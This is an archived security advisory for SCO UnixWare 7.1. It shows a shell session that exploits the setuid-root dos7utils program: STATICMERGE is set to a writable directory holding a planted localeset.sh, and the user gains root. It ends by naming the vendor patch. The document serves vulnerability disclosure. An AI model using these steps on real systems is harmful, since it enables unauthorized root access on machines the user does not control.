COMMAND

    dos7utils

SYSTEMS AFFECTED

    SCO UnixWare 7.1

PROBLEM

    Brock  Tellier  found  following.   A  vulnerability exists in the
    /usr/lib/merge/dos7utils  program  (suid  root  by  default) which
    allows any  user to  execute any  command as  root.  The dos7utils
    program  gets  its  localeset.sh  exec  path  from the environment
    variable STATICMERGE.  By setting this to a directory writable  by
    us  and  setting  the  -f  switch,  we  can have dos7utils run our
    program as follows:

        bash-2.02$ uname -a; id; pwd
        UnixWare fear71 5 7.1.0 i386 x86at SCO UNIX_SVR5
        uid=101(xnec) gid=1(other)
        /usr/lib/merge
        bash-2.02$ export STATICMERGE=/tmp
        bash-2.02$ cat > /tmp/localeset.sh
        #!/bin/sh
        id
        bash-2.02$ chmod 700 /tmp/localeset.sh
        bash-2.02$ ./dos7utils -f bah
        uid=0(root) gid=1(other)
        groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
        bash-2.02$

SOLUTION

    Download the sse037.tar.Z from SCO site.  That's the patch.